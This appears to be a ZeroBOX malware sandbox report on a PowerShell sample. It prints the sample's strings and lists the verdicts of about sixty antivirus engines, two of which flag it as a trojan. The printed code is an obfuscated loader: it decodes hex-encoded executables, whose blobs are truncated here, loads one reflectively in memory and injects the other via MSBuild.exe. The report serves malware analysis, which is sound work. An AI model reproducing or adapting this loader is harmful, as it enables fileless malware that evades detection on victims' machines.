Static | ZeroBOX
No static analysis available.
[String]$InterserverLogin='4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C010300DAB5AB600000000000000000E00002010B0108000056030000060000000000005E75030000200000000000000000400000200000000200000400000000000000040000000000000000C003000002000000000000020040850000100000100000000010000010000000000000100000000000000000000000087503005300000000800300200300000000000000000000000000000000000000A003000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E7465787400000064550300002000000056030000020000000000000000000000000000200000602E7273726300000020030000008003000004000000580300000000000000000000000000400000402E72656C6F6300000C00000000A0030000020000005C03000000000000000000000000004000004200000
Function FHGJKLHJKGJFHJGKJHLIHKVJGCJVHBKJ {
[CmdletBinding()]
[OutputType([byte[]])]
param(
[Parameter(Mandatory=$true)] [String]$H3
$vbdhjujusyujczz = New-Object -TypeName byte[] -ArgumentList ($H3.Length / 2)
for ($i = 0; $i -lt $H3.Length; $i += 2) {
$vbdhjujusyujczz[$i / 2] = [Convert]::ToByte($H3.Substring($i, 2), 16)
return [byte[]]$vbdhjujusyujczz
[String]$yrryyuxvsdsf='4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C010300A60011B70000000000000000E00002210B013000004600000006000000000000BE65000000200000008000000000001000200000000200000400000000000000040000000000000000C0000000020000000000000300408500001000001000000000100000100000000000001000000000000000000000006C6500004F00000000800000080300000000000000000000000000000000000000A000000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E74657874000000C4450000002000000046000000020000000000000000000000000000200000602E7273726300000008030000008000000004000000480000000000000000000000000000400000402E72656C6F6300000C00000000A0000000020000004C00000000000000000000000000004000004200000000
[Byte[]]$H5=FHGJKLHJKGJFHJGKJHLIHKVJGCJVHBKJ $yrryyuxvsdsf
[Byte[]]$H6= FHGJKLHJKGJFHJGKJHLIHKVJGCJVHBKJ $InterserverLogin
[Byte[]]$H5=FHGJKLHJKGJFHJGKJHLIHKVJGCJVHBKJ $yrryyuxvsdsf
$ali = "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
[Reflection.Assembly]::Load($H5).GetType('WpfControlLibrary1.LOGO').GetMethod('bit_alosh').Invoke($null,[object[]] ($ali,$H6))
Antivirus Signature
Bkav Clean
DrWeb Clean
ClamAV Clean
FireEye Clean
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Arcabit Clean
BitDefenderTheta Clean
Cyren Clean
Symantec ML.Attribute.HighConfidence
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Clean
Cynet Clean
Kaspersky HEUR:Trojan.PowerShell.Generic
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
AegisLab Clean
MicroWorld-eScan Clean
Tencent Clean
Ad-Aware Clean
Sophos Clean
Comodo Clean
F-Secure Clean
Baidu Clean
VIPRE Clean
TrendMicro Clean
McAfee-GW-Edition Clean
CMC Clean
Emsisoft Clean
Jiangmin Clean
Avira Clean
MAX Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Microsoft Clean
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.PowerShell.Generic
GData Clean
AhnLab-V3 Clean
VBA32 Clean
TACHYON Clean
Zoner Clean
Rising Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet Clean
Panda Clean
Qihoo-360 Clean
No IRMA results available.